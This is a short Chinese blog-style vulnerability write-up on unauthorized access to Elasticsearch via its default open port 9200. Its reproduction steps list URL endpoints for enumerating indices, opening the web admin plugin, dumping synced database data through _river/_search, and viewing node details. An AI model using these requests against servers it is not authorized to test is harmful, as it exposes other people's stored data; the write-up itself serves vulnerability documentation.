## Elasticsearch未授权访问
### 一、漏洞简介
ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。
### 二、影响范围
### 三、复现过程
安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。
“`
http://url:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。
http://url:9200/_plugin/head/ web管理界面
http://url:9200/_cat/indices
http://url:9200/_river/_search 查看数据库敏感信息
http://url:9200/_nodes 查看节点数据
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容